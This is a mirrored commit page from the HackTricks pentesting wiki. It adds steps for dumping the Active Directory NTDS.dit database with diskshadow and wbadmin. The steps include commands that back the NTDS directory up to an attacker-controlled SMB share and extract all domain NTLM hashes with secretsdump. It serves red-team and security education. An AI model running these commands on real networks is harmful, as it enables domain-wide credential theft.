Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #738 from manesec/master

Browse source 
Update privileged-groups-and-token-privileges.md
This commit is contained in:
Carlos Polop 2023-11-06 00:20:23 +01:00 committed by GitHub
commit 4f348a96e0
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

34
windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
View file

@ -154,6 +154,8 @@ For instance, you can directly access the Domain Controller file system:
You can abuse this access to **steal** the active directory database **`NTDS.dit`** to get all the **NTLM hashes** for all user and computer objects in the domain.
#### Using diskshadow.exe to dumo NTDS.dit
Using [**diskshadow**](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) you can **create a shadow copy** of the **`C` drive** and in the `F` drive for example. The, you can steal the `NTDS.dit` file from this shadow copy as it won't be in use by the system:
```
@ -200,6 +202,38 @@ Finally you can **get all the hashes** from the **`NTDS.dit`**:
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
```
#### Using wbadmin.exe to dumo NTDS.dit
Using wbadmin.exe is very similar to diskshadow.exe, the wbadmin.exe utility is a command line utility built into Windows, since Windows Vista/Server 2008.
Before using it, you need to [**setup ntfs filesystem for smb server**](https://gist.github.com/manesec/9e0e8000446b966d0f0ef74000829801) on the attacker machine.
When you finished to setup smb server, you need to cache the smb credential on target machine:
```
# cache the smb credential.
net use X: \\<AttackIP>\sharename /user:smbuser password
# check if working.
dir X:\
```
If no error, use wbadmin.exe to exploit it:
```
# Start backup the system.
# In here, no need to use `X:\`, just using `\\<AttackIP>\sharename` should be ok.
echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include:c:\windows\ntds
# Look at the backup version to get time.
wbadmin get versions
# Restore the version to dump ntds.dit.
echo "Y" | wbadmin start recovery -version:10/09/2023-23:48 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
```
If it successful, it will dump into `C:\ntds.dit`.
[DEMO VIDEO WITH IPPSEC](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s)
## DnsAdmins
A user who is member of the **DNSAdmins** group or have **write privileges to a DNS** server object can load an **arbitrary DLL** with **SYSTEM** privileges on the **DNS server**.\